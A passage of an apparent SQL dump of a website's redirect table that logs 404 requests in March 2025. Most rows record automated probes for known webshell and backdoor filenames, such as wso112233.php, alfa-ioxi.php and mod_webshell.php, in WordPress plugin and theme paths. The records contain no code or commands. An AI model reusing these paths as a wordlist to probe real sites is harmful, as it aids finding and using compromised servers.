00:00:00',301),(39064,'http://www.3s-technologies.com.tr/tr/.well-known/autoload_classmap.php',NULL,'http://www.3s-technologies.com.tr//.well-known/autoload_classmap.php','',1,0,'2025-03-25 11:24:26','0000-00-00 00:00:00',301),(39065,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/press/wp-class.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/press/wp-class.php','',1,0,'2025-03-25 11:24:30','0000-00-00 00:00:00',301),(39066,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/pwnd1/pwnd.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/pwnd1/pwnd.php','',1,0,'2025-03-25 11:24:31','0000-00-00 00:00:00',301),(39067,'http://www.3s-technologies.com.tr/tr/update.php',NULL,'http://www.3s-technologies.com.tr//update.php','',1,0,'2025-03-25 11:24:32','0000-00-00 00:00:00',301),(39068,'http://www.3s-technologies.com.tr/tr/wp-admin/maint/go.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/maint/go.php','',1,0,'2025-03-25 11:24:34','0000-00-00 00:00:00',301),(39069,'http://www.3s-technologies.com.tr/tr/wp-blog-footer.php',NULL,'http://www.3s-technologies.com.tr//wp-blog-footer.php','',1,0,'2025-03-25 11:24:40','0000-00-00 00:00:00',301),(39070,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/dzs-zoomsounds/1877.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/dzs-zoomsounds/1877.php','',1,0,'2025-03-25 11:24:42','0000-00-00 00:00:00',301),(39071,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/sid/sidwso.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/sid/sidwso.php','',1,0,'2025-03-25 11:24:45','0000-00-00 00:00:00',301),(39072,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/wordpresss3cll/up.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/wordpresss3cll/up.php','',1,0,'2025-03-25 11:24:50','0000-00-00 00:00:00',301),(39073,'http://www.3s-technologies.com.tr/tr/wp-admin/maint/about.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/maint/about.php','',7,0,'2025-03-25 11:24:51','0000-00-00 00:00:00',301),(39074,'http://www.3s-technologies.com.tr/tr/wso112233.php',NULL,'http://www.3s-technologies.com.tr//wso112233.php','',2,0,'2025-03-25 11:24:53','0000-00-00 00:00:00',301),(39075,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/royal-ckeditor/admin.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/royal-ckeditor/admin.php','',1,0,'2025-03-25 11:24:56','0000-00-00 00:00:00',301),(39076,'http://www.3s-technologies.com.tr/tr/default.php',NULL,'http://www.3s-technologies.com.tr//default.php','',11,0,'2025-03-25 11:25:05','0000-00-00 00:00:00',301),(39077,'http://www.3s-technologies.com.tr/tr/wp-includes/assets/winnner.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/assets/winnner.php','',1,0,'2025-03-25 11:25:07','0000-00-00 00:00:00',301),(39078,'http://www.3s-technologies.com.tr/tr/wp-includes/update.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/update.php','',1,0,'2025-03-25 11:25:09','0000-00-00 00:00:00',301),(39079,'http://www.3s-technologies.com.tr/tr/wp-blog.php',NULL,'http://www.3s-technologies.com.tr//wp-blog.php','',14,0,'2025-03-25 11:25:11','0000-00-00 00:00:00',301),(39080,'http://www.3s-technologies.com.tr/tr/wp-admin/user/about.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/user/about.php','',8,0,'2025-03-25 11:25:13','0000-00-00 00:00:00',301),(39081,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/about.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/about.php','',1,0,'2025-03-25 11:25:15','0000-00-00 00:00:00',301),(39082,'http://www.3s-technologies.com.tr/tr/wp-admin/css/ok.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/css/OK.php','',1,0,'2025-03-25 11:25:16','0000-00-00 00:00:00',301),(39083,'http://www.3s-technologies.com.tr/tr/fm1.php',NULL,'http://www.3s-technologies.com.tr//fm1.php','',1,0,'2025-03-25 11:25:18','0000-00-00 00:00:00',301),(39084,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/anttt/simple.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/anttt/simple.php','',1,0,'2025-03-25 11:25:20','0000-00-00 00:00:00',301),(39085,'http://www.3s-technologies.com.tr/tr/xmrlpc.php',NULL,'http://www.3s-technologies.com.tr//xmrlpc.php','',4,0,'2025-03-25 11:25:22','0000-00-00 00:00:00',301),(39086,'http://www.3s-technologies.com.tr/tr/file/function.php',NULL,'http://www.3s-technologies.com.tr//file/function.php','',1,0,'2025-03-25 11:25:24','0000-00-00 00:00:00',301),(39087,'http://www.3s-technologies.com.tr/tr/amaxx.php',NULL,'http://www.3s-technologies.com.tr//amaxx.php','',1,0,'2025-03-25 11:25:26','0000-00-00 00:00:00',301),(39088,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/wpcall-button/button-image.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/wpcall-button/button-image.php','',1,0,'2025-03-25 11:25:30','0000-00-00 00:00:00',301),(39089,'http://www.3s-technologies.com.tr/tr/wp-content/themes/finley/min.php',NULL,'http://www.3s-technologies.com.tr//wp-content/themes/finley/min.php','',1,0,'2025-03-25 11:25:36','0000-00-00 00:00:00',301),(39090,'http://www.3s-technologies.com.tr/tr/alfa-ioxi.php',NULL,'http://www.3s-technologies.com.tr//alfa-ioxi.php','',2,0,'2025-03-25 11:25:37','0000-00-00 00:00:00',301),(39091,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/background-image-cropper/ups.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/background-image-cropper/ups.php','',1,0,'2025-03-25 11:25:39','0000-00-00 00:00:00',301),(39092,'http://www.3s-technologies.com.tr/tr/wp-content/threefox_exploit/threefox.php',NULL,'http://www.3s-technologies.com.tr//wp-content/ThreeFox_Exploit/threefox.php','',1,0,'2025-03-25 11:25:42','0000-00-00 00:00:00',301),(39093,'http://www.3s-technologies.com.tr/tr/wp-content/themes/digital-download/up.php',NULL,'http://www.3s-technologies.com.tr//wp-content/themes/digital-download/up.php','',1,0,'2025-03-25 11:25:51','0000-00-00 00:00:00',301),(39094,'http://www.3s-technologies.com.tr/tr/bypass1.php',NULL,'http://www.3s-technologies.com.tr//bypass1.php','',1,0,'2025-03-25 11:26:22','0000-00-00 00:00:00',301),(39095,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/fighter/ultra.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/fighter/ultra.php','',1,0,'2025-03-25 11:26:24','0000-00-00 00:00:00',301),(39096,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/fighter/fk.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/fighter/fk.php','',1,0,'2025-03-25 11:26:29','0000-00-00 00:00:00',301),(39097,'http://www.3s-technologies.com.tr/tr/al.php',NULL,'http://www.3s-technologies.com.tr//al.php','',2,0,'2025-03-25 11:26:31','0000-00-00 00:00:00',301),(39098,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/import-export-for-woocommerce/product/import_manual_1737090262.php',NULL,'http://www.3s-technologies.com.tr//wp-content/uploads/import-export-for-woocommerce/product/import_manual_1737090262.php','',1,0,'2025-03-25 11:26:34','0000-00-00 00:00:00',301),(39099,'http://www.3s-technologies.com.tr/tr/wp-content/themes/mha/db.php?u',NULL,'http://www.3s-technologies.com.tr//wp-content/themes/mha/db.php?u','',1,0,'2025-03-25 11:26:36','0000-00-00 00:00:00',301),(39100,'http://www.3s-technologies.com.tr/tr/wp-content/themes/dikan/db.php?u',NULL,'http://www.3s-technologies.com.tr//wp-content/themes/dikan/db.php?u','',1,0,'2025-03-25 11:26:40','0000-00-00 00:00:00',301),(39101,'http://www.3s-technologies.com.tr/tr/wp-admin/includes/moon.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/includes/moon.php','',1,0,'2025-03-25 11:26:43','0000-00-00 00:00:00',301),(39102,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/seoxx/asasx.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/seoxx/asasx.php','',1,0,'2025-03-25 11:26:45','0000-00-00 00:00:00',301),(39103,'http://www.3s-technologies.com.tr/tr/wp-content/bk/index.php',NULL,'http://www.3s-technologies.com.tr//wp-content/bk/index.php','',1,0,'2025-03-25 11:26:49','0000-00-00 00:00:00',301),(39104,'http://www.3s-technologies.com.tr/tr/class-db.php',NULL,'http://www.3s-technologies.com.tr//class-db.php','',2,0,'2025-03-25 11:26:50','0000-00-00 00:00:00',301),(39105,'http://www.3s-technologies.com.tr/tr/wp-content/class-db.php',NULL,'http://www.3s-technologies.com.tr//wp-content/class-db.php','',1,0,'2025-03-25 11:26:53','0000-00-00 00:00:00',301),(39106,'http://www.3s-technologies.com.tr/tr/wp-includes/class-db.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/class-db.php','',1,0,'2025-03-25 11:26:55','0000-00-00 00:00:00',301),(39107,'http://www.3s-technologies.com.tr/tr/wp-admin/class-db.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/class-db.php','',4,0,'2025-03-25 11:26:59','0000-00-00 00:00:00',301),(39108,'http://www.3s-technologies.com.tr/tr/vendor/htmlawed/htmlawed/htmlawedtest.php',NULL,'http://www.3s-technologies.com.tr//vendor/htmlawed/htmlawed/htmLawedTest.php','',1,0,'2025-03-25 11:27:01','0000-00-00 00:00:00',301),(39109,'http://www.3s-technologies.com.tr/tr/modules/mod_webshell/mod_webshell.php',NULL,'http://www.3s-technologies.com.tr//modules/mod_webshell/mod_webshell.php','',1,0,'2025-03-25 11:27:04','0000-00-00 00:00:00',301),(39110,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/chosen.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/chosen.php','',1,0,'2025-03-25 11:27:08','0000-00-00 00:00:00',301),(39111,'http://www.3s-technologies.com.tr/tr/lv.php',NULL,'http://www.3s-technologies.com.tr//lv.php','',14,0,'2025-03-25 11:27:10','0000-00-00 00:00:00',301),(39112,'http://www.3s-technologies.com.tr/tr/wp-includes/requests/about.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/Requests/about.php','',2,0,'2025-03-25 11:27:13','0000-00-00 00:00:00',301),(39113,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/classic-editor/wp-login.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/classic-editor/wp-login.php','',1,0,'2025-03-25 11:27:17','0000-00-00 00:00:00',301),(39114,'http://www.3s-technologies.com.tr/tr/wp-content/themes/travelscape/json.php',NULL,'http://www.3s-technologies.com.tr//wp-content/themes/travelscape/json.php','',2,0,'2025-03-25 11:27:18','0000-00-00 00:00:00',301),(39115,'http://www.3s-technologies.com.tr/tr/wp-head.php',NULL,'http://www.3s-technologies.com.tr//wp-head.php','',2,0,'2025-03-25 11:27:25','0000-00-00 00:00:00',301),(39116,'http://www.3s-technologies.com.tr/tr/alfa-rex.php7',NULL,'http://www.3s-technologies.com.tr//alfa-rex.php7','',4,0,'2025-03-25 11:27:26','0000-00-00 00:00:00',301),(39117,'http://www.3s-technologies.com.tr/tr/.tmb/wp-login.php',NULL,'http://www.3s-technologies.com.tr//.tmb/wp-login.php','',1,0,'2025-03-25 11:27:29','0000-00-00 00:00:00',301),(39118,'http://www.3s-technologies.com.tr/tr/style2.php',NULL,'http://www.3s-technologies.com.tr//style2.php','',1,0,'2025-03-25 11:27:31','0000-00-00 00:00:00',301),(39119,'http://www.3s-technologies.com.tr/tr/wp-admin/includes/class-wp-filesystem-base.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/includes/class-wp-filesystem-base.php','',1,0,'2025-03-25 11:27:34','0000-00-00 00:00:00',301),(39120,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/simple/simple.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/simple/simple.php','',1,0,'2025-03-25 11:27:36','0000-00-00 00:00:00',301),(39121,'http://www.3s-technologies.com.tr/tr/ty.php',NULL,'http://www.3s-technologies.com.tr//ty.php','',5,0,'2025-03-25 11:27:38','0000-00-00 00:00:00',301),(39122,'http://www.3s-technologies.com.tr/tr/wp-includes/style-engine/about.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/style-engine/about.php','',6,0,'2025-03-25 11:27:40','0000-00-00 00:00:00',301),(39123,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/cache/cache.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/Cache/Cache.php','',1,0,'2025-03-25 11:27:42','0000-00-00 00:00:00',301),(39124,'http://www.3s-technologies.com.tr/tr/users.php',NULL,'http://www.3s-technologies.com.tr//users.php','',4,0,'2025-03-25 11:27:43','0000-00-00 00:00:00',301),(39125,'http://www.3s-technologies.com.tr/tr/themes/zmousse/otuz1.php',NULL,'http://www.3s-technologies.com.tr//themes/zMousse/otuz1.php','',1,0,'2025-03-25 11:27:45','0000-00-00 00:00:00',301),(39126,'http://www.3s-technologies.com.tr/tr/ga13.php',NULL,'http://www.3s-technologies.com.tr//GA13.php','',1,0,'2025-03-25 11:27:47','0000-00-00 00:00:00',301),(39127,'http://www.3s-technologies.com.tr/tr/wp-content/themes/hariko/lib.php',NULL,'http://www.3s-technologies.com.tr//wp-content/themes/hariko/lib.php','',1,0,'2025-03-25 11:27:49','0000-00-00 00:00:00',301),(39128,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/wp-help/admin/wp-fclass.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/wp-help/admin/wp-fclass.php','',1,0,'2025-03-25 11:27:51','0000-00-00 00:00:00',301),(39129,'http://www.3s-technologies.com.tr/tr/wp-apxupx.php',NULL,'http://www.3s-technologies.com.tr//wp-apxupx.php','',1,0,'2025-03-25 11:27:56','0000-00-00 00:00:00',301),(39130,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/tunnelforms/lib.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/tunnelforms/lib.php','',1,0,'2025-03-25 11:27:58','0000-00-00 00:00:00',301),(39131,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/wpr-addons/forms/b1ack.php',NULL,'http://www.3s-technologies.com.tr//wp-content/uploads/wpr-addons/forms/b1ack.php','',1,0,'2025-03-25 11:28:00','0000-00-00 00:00:00',301),(39132,'http://www.3s-technologies.com.tr/tr/wp-includes/certificates/plugins.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/certificates/plugins.php','',1,0,'2025-03-25 11:28:03','0000-00-00 00:00:00',301),(39133,'http://www.3s-technologies.com.tr/tr/wp-content/themes/travel/issue.php',NULL,'http://www.3s-technologies.com.tr//wp-content/themes/travel/issue.php','',1,0,'2025-03-25 11:28:05','0000-00-00 00:00:00',301),(39134,'http://www.3s-technologies.com.tr/tr/bads.php',NULL,'http://www.3s-technologies.com.tr//bads.php','',1,0,'2025-03-25 11:28:06','0000-00-00 00:00:00',301),(39135,'http://www.3s-technologies.com.tr/tr/wp-includes/id3/bads.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/ID3/bads.php','',1,0,'2025-03-25 11:28:10','0000-00-00 00:00:00',301),(39136,'http://www.3s-technologies.com.tr/tr/wp-content/bads/index.php?bads',NULL,'http://www.3s-technologies.com.tr//wp-content/bads/index.php?bads','',1,0,'2025-03-25 11:28:12','0000-00-00 00:00:00',301),(39137,'http://www.3s-technologies.com.tr/tr/wp-includes/fonts/class-wp-font-library.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/fonts/class-wp-font-library.php','',1,0,'2025-03-25 11:28:14','0000-00-00 00:00:00',301),(39138,'http://www.3s-technologies.com.tr/tr/mar/function.php',NULL,'http://www.3s-technologies.com.tr//mar/function.php','',1,0,'2025-03-25 11:28:15','0000-00-00 00:00:00',301),(39139,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/seox/up.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/seox/up.php','',1,0,'2025-03-25 11:28:17','0000-00-00 00:00:00',301),(39140,'http://www.3s-technologies.com.tr/tr/wp-content/themes/wordpress-mag/up.php',NULL,'http://www.3s-technologies.com.tr//wp-content/themes/wordpress-mag/up.php','',1,0,'2025-03-25 11:28:19','0000-00-00 00:00:00',301),(39141,'http://www.3s-technologies.com.tr/tr/wp-content/themes/wordpress-mag/0x1949.php',NULL,'http://www.3s-technologies.com.tr//wp-content/themes/wordpress-mag/0x1949.php','',1,0,'2025-03-25 11:28:22','0000-00-00 00:00:00',301),(39142,'http://www.3s-technologies.com.tr/tr/wp-content/themes/pridmag/contact.php',NULL,'http://www.3s-technologies.com.tr//wp-content/themes/pridmag/contact.php','',1,0,'2025-03-25 11:28:24','0000-00-00 00:00:00',301),(39143,'http://www.3s-technologies.com.tr/tr/uploaded_script.php',NULL,'http://www.3s-technologies.com.tr//uploaded_script.php','',1,0,'2025-03-25 11:28:26','0000-00-00 00:00:00',301),(39144,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/fix5/index.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/fix5/index.php','',1,0,'2025-03-25 11:28:30','0000-00-00 00:00:00',301),(39145,'http://www.3s-technologies.com.tr/tr/media/plg_captcha_recaptcha/js/recaptcha.min.js.map',NULL,'','',1,0,'2025-03-25 12:14:07','0000-00-00 00:00:00',301),(39146,'http://www.3s-technologies.com.tr/tr/media/system/js/keepalive.js.map',NULL,'','',1,0,'2025-03-25 12:15:06','0000-00-00 00:00:00',301),(39147,'http://www.3s-technologies.com.tr/tr/media/jui/js/jquery-noconflict.js.map',NULL,'','',1,0,'2025-03-25 12:16:52','0000-00-00 00:00:00',301),(39148,'http://www.3s-technologies.com.tr/tr/media/system/js/punycode.js.map',NULL,'','',1,0,'2025-03-25 12:17:43','0000-00-00 00:00:00',301),(39149,'http://www.3s-technologies.com.tr/tr/media/jui/js/jquery.min.js.map',NULL,'','',1,0,'2025-03-25 12:17:51','0000-00-00 00:00:00',301),(39150,'http://www.3s-technologies.com.tr/tr/media/system/js/mootools-core.js.map',NULL,'','',1,0,'2025-03-25 12:18:55','0000-00-00 00:00:00',301),(39151,'http://www.3s-technologies.com.tr/tr/media/system/js/caption.js.map',NULL,'','',1,0,'2025-03-25 12:19:22','0000-00-00 00:00:00',301),(39152,'http://www.3s-technologies.com.tr/tr/media/system/js/validate.js.map',NULL,'','',1,0,'2025-03-25 12:22:25','0000-00-00 00:00:00',301),(39153,'http://www.3s-technologies.com.tr/tr/media/djextensions/jquery-easing/jquery.easing.min.js.map',NULL,'','',1,0,'2025-03-25 12:23:14','0000-00-00 00:00:00',301),(39154,'http://www.3s-technologies.com.tr/tr/media/jui/js/jquery-migrate.min.js.map',NULL,'','',1,0,'2025-03-25 12:23:33','0000-00-00 00:00:00',301),(39155,'http://www.3s-technologies.com.tr/tr/templates/beez5/javascript/md_stylechanger.js.map',NULL,'','',1,0,'2025-03-25 12:26:50','0000-00-00 00:00:00',301),(39156,'http://www.3s-technologies.com.tr/tr/plugins/content/jw_allvideos/jw_allvideos/includes/js/behaviour.js.map',NULL,'','',1,0,'2025-03-25 12:27:20','0000-00-00 00:00:00',301),(39157,'http://www.3s-technologies.com.tr/tr/media/system/js/core.js.map',NULL,'','',1,0,'2025-03-25 12:27:31','0000-00-00 00:00:00',301),(39158,'http://www.3s-technologies.com.tr/tr/templates/beez5/javascript/hide.js.map',NULL,'','',1,0,'2025-03-25 12:28:23','0000-00-00 00:00:00',301),(39159,'http://www.3s-technologies.com.tr/tr/media/jui/js/bootstrap.min.js.map',NULL,'','',1,0,'2025-03-25 12:28:25','0000-00-00 00:00:00',301),(39160,'http://www.3s-technologies.com.tr/tr/media/system/js/mootools-more.js.map',NULL,'','',1,0,'2025-03-25 12:28:54','0000-00-00 00:00:00',301),(39161,'http://www.3s-technologies.com.tr/tr/modules/mod_djimageslider/assets/js/slider.js.map',NULL,'','',1,0,'2025-03-25 12:30:01','0000-00-00 00:00:00',301),(39162,'http://3s-technologies.com.tr/tr/wp-content/plugins/eventon-addon/admin.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/eventon-addon/admin.php','',1,0,'2025-03-25 13:05:07','0000-00-00 00:00:00',301),(39163,'http://3s-technologies.com.tr/tr/wp-content/plugins/phpadmin/acp.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/phpadmin/acp.php','',3,0,'2025-03-25 13:05:18','0000-00-00 00:00:00',301),(39164,'http://3s-technologies.com.tr/tr/wp-content/uploads/wp_live_chat/abruzi.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/wp_live_chat/abruzi.php','',1,0,'2025-03-25 13:05:31','0000-00-00 00:00:00',301),(39165,'http://3s-technologies.com.tr/tr/wp-content/themes/mero-megazines/ws.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/mero-megazines/ws.php','',2,0,'2025-03-25 13:05:32','0000-00-00 00:00:00',301),(39166,'http://3s-technologies.com.tr/tr/wp-content/plugins/dhon/newsfeed.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/dhon/newsfeed.php','',1,0,'2025-03-25 13:05:39','0000-00-00 00:00:00',301),(39167,'http://3s-technologies.com.tr/tr/wp-content/plugins/phpad/acp.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/phpad/acp.php','',2,0,'2025-03-25 13:05:40','0000-00-00 00:00:00',301),(39168,'http://3s-technologies.com.tr/tr/iles.php',NULL,'http://3s-technologies.com.tr/iles.php','',1,0,'2025-03-25 13:05:43','0000-00-00 00:00:00',301),(39169,'http://3s-technologies.com.tr/tr/wp-content/themes/signify/firkon.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/signify/firkon.php','',2,0,'2025-03-25 13:05:44','0000-00-00 00:00:00',301),(39170,'http://3s-technologies.com.tr/tr/wp-content/plugins/xwp/up.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/xwp/up.php','',1,0,'2025-03-25 13:05:52','0000-00-00 00:00:00',301),(39171,'http://3s-technologies.com.tr/tr/menusystem32.php.php',NULL,'http://3s-technologies.com.tr/menusystem32.php.php','',1,0,'2025-03-25 13:05:54','0000-00-00 00:00:00',301),(39172,'http://3s-technologies.com.tr/tr/yahoo.php',NULL,'http://3s-technologies.com.tr/yahoo.php','',1,0,'2025-03-25 13:06:02','0000-00-00 00:00:00',301),(39173,'http://3s-technologies.com.tr/tr/wp-content/plugins/xltavrat.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins//xltavrat.php','',1,0,'2025-03-25 13:06:15','0000-00-00 00:00:00',301),(39174,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/core/curve25519-items.php',NULL,'http://3s-technologies.com.tr/wp-includes/sodium_compat/src/Core/Curve25519-items.php','',3,0,'2025-03-25 13:06:21','0000-00-00 00:00:00',301),(39175,'http://3s-technologies.com.tr/tr/wp-content/plugins/classic-addon/admin.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/classic-addon/admin.php','',1,0,'2025-03-25 13:06:29','0000-00-00 00:00:00',301),(39176,'http://3s-technologies.com.tr/tr/system32.php',NULL,'http://3s-technologies.com.tr/system32.php','',1,0,'2025-03-25 13:06:31','0000-00-00 00:00:00',301),(39177,'https://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/dynupdate.js.map',NULL,'','',1,0,'2025-03-25 13:11:55','0000-00-00 00:00:00',301),(39178,'https://3s-technologies.com.tr/tr/media/jui/js/jquery-noconflict.js.map',NULL,'','',3,0,'2025-03-25 13:13:17','0000-00-00 00:00:00',301),(39179,'https://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/vmprices.js.map',NULL,'','',2,0,'2025-03-25 13:14:46','0000-00-00 00:00:00',301),(39180,'https://3s-technologies.com.tr/tr/media/system/js/core.js.map',NULL,'','',3,0,'2025-03-25 13:15:57','0000-00-00 00:00:00',301),(39181,'https://3s-technologies.com.tr/tr/media/system/js/mootools-core.js.map',NULL,'','',3,0,'2025-03-25 13:26:16','0000-00-00 00:00:00',301),(39182,'https://3s-technologies.com.tr/tr/media/jui/js/jquery.min.js.map',NULL,'','',3,0,'2025-03-25 13:26:34','0000-00-00 00:00:00',301),(39183,'https://3s-technologies.com.tr/tr/modules/mod_djimageslider/assets/js/slider.js.map',NULL,'','',2,0,'2025-03-25 13:33:12','0000-00-00 00:00:00',301),(39184,'https://3s-technologies.com.tr/tr/modules/mod_virtuemart_cart/assets/js/update_cart.js.map',NULL,'','',1,0,'2025-03-25 13:40:53','0000-00-00 00:00:00',301),(39185,'https://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/fancybox/jquery.fancybox-1.3.4.pack.js.map',NULL,'','',1,0,'2025-03-25 13:41:53','0000-00-00 00:00:00',301),(39186,'https://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/jquery.validationengine.js.map',NULL,'','',1,0,'2025-03-25 13:42:07','0000-00-00 00:00:00',301),(39187,'https://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/vmsite.js.map',NULL,'','',3,0,'2025-03-25 13:45:39','0000-00-00 00:00:00',301),(39188,'https://3s-technologies.com.tr/tr/templates/beez5/javascript/md_stylechanger.js.map',NULL,'','',5,0,'2025-03-25 13:51:19','0000-00-00 00:00:00',301),(39189,'https://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/languages/jquery.validationengine-en.js.map',NULL,'','',1,0,'2025-03-25 13:53:37','0000-00-00 00:00:00',301),(39190,'https://3s-technologies.com.tr/tr/media/system/js/caption.js.map',NULL,'','',3,0,'2025-03-25 13:55:35','0000-00-00 00:00:00',301),(39191,'https://3s-technologies.com.tr/tr/media/djextensions/jquery-easing/jquery.easing.min.js.map',NULL,'','',2,0,'2025-03-25 13:59:16','0000-00-00 00:00:00',301),(39192,'https://3s-technologies.com.tr/tr/templates/beez5/javascript/hide.js.map',NULL,'','',4,0,'2025-03-25 14:01:14','0000-00-00 00:00:00',301),(39193,'https://3s-technologies.com.tr/tr/media/jui/js/jquery-migrate.min.js.map',NULL,'','',3,0,'2025-03-25 14:02:09','0000-00-00 00:00:00',301),(39194,'https://3s-technologies.com.tr/tr/media/system/js/mootools-more.js.map',NULL,'','',3,0,'2025-03-25 14:06:01','0000-00-00 00:00:00',301),(39195,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/npm-detail/askquestion?tmpl=component',NULL,'','',4,0,'2025-03-25 14:07:10','0000-00-00 00:00:00',301),(39196,'https://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/chosen.jquery.min.js.map',NULL,'','',2,0,'2025-03-25 14:08:39','0000-00-00 00:00:00',301),(39197,'https://3s-technologies.com.tr/tr/media/plg_captcha_recaptcha/js/recaptcha.min.js.map',NULL,'','',1,0,'2025-03-25 14:09:22','0000-00-00 00:00:00',301),(39198,'http://3s-technologies.com.tr/en/past.php',NULL,'','',13,0,'2025-03-27 03:54:54','0000-00-00 00:00:00',301),(39199,'https://www.3s-technologies.com.tr/tr/wp-json/wc/store/cart',NULL,'','',1,0,'2025-03-27 17:39:12','0000-00-00 00:00:00',301),(39200,'http://3s-technologies.com.tr/tr/sim.php/wp-includes/certificates/plugins.php',NULL,'','',54,0,'2025-03-28 13:25:32','0000-00-00 00:00:00',301),(39201,'http://3s-technologies.com.tr/tr/admin/upload/css.php',NULL,'','',68,0,'2025-03-28 13:25:46','0000-00-00 00:00:00',301),(39202,'http://3s-technologies.com.tr/tr/ispeconline.com/css/index.php',NULL,'','',7,0,'2025-03-28 13:26:00','0000-00-00 00:00:00',301),(39203,'http://3s-technologies.com.tr/tr/files/index.php',NULL,'','',110,0,'2025-03-28 13:26:03','0000-00-00 00:00:00',301),(39204,'http://3s-technologies.com.tr/tr/wp-includes/bak.php',NULL,'','',19,0,'2025-03-28 13:26:07','0000-00-00 00:00:00',301),(39205,'http://3s-technologies.com.tr/tr/home/storage/0/b8/30/localexpress1/public_html/wp-content/uploads',NULL,'','',3,0,'2025-03-28 13:26:09','0000-00-00 00:00:00',301),(39206,'http://3s-technologies.com.tr/tr/wp-includes/cloud.php',NULL,'','',6,0,'2025-03-28 13:26:13','0000-00-00 00:00:00',301),(39207,'http://3s-technologies.com.tr/tr/wp-content/dropdown.php',NULL,'','',42,0,'2025-03-28 13:26:25','0000-00-00 00:00:00',301),(39208,'http://3s-technologies.com.tr/tr/wp-includes/404.php',NULL,'','',23,0,'2025-03-28 13:26:27','0000-00-00 00:00:00',301),(39209,'http://3s-technologies.com.tr/tr/wp-content/upgrade/index.php',NULL,'','',142,0,'2025-03-28 13:26:28','0000-00-00 00:00:00',301),(39210,'http://3s-technologies.com.tr/tr/wp-content/cloud.php',NULL,'','',9,0,'2025-03-28 13:26:31','0000-00-00 00:00:00',301),(39211,'http://3s-technologies.com.tr/tr/wp-includes/function.php',NULL,'','',13,0,'2025-03-28 13:26:34','0000-00-00 00:00:00',301),(39212,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/autoload_classmap.php',NULL,'','',11,0,'2025-03-28 13:26:36','0000-00-00 00:00:00',301),(39213,'http://3s-technologies.com.tr/tr/wp-trackback.php',NULL,'','',303,0,'2025-03-28 13:26:42','0000-00-00 00:00:00',301),(39214,'http://3s-technologies.com.tr/tr/.well-known/cloud.php',NULL,'','',6,0,'2025-03-28 13:26:48','0000-00-00 00:00:00',301),(39215,'http://3s-technologies.com.tr/tr/.well-known/wp-load.php',NULL,'','',8,0,'2025-03-28 13:26:49','0000-00-00 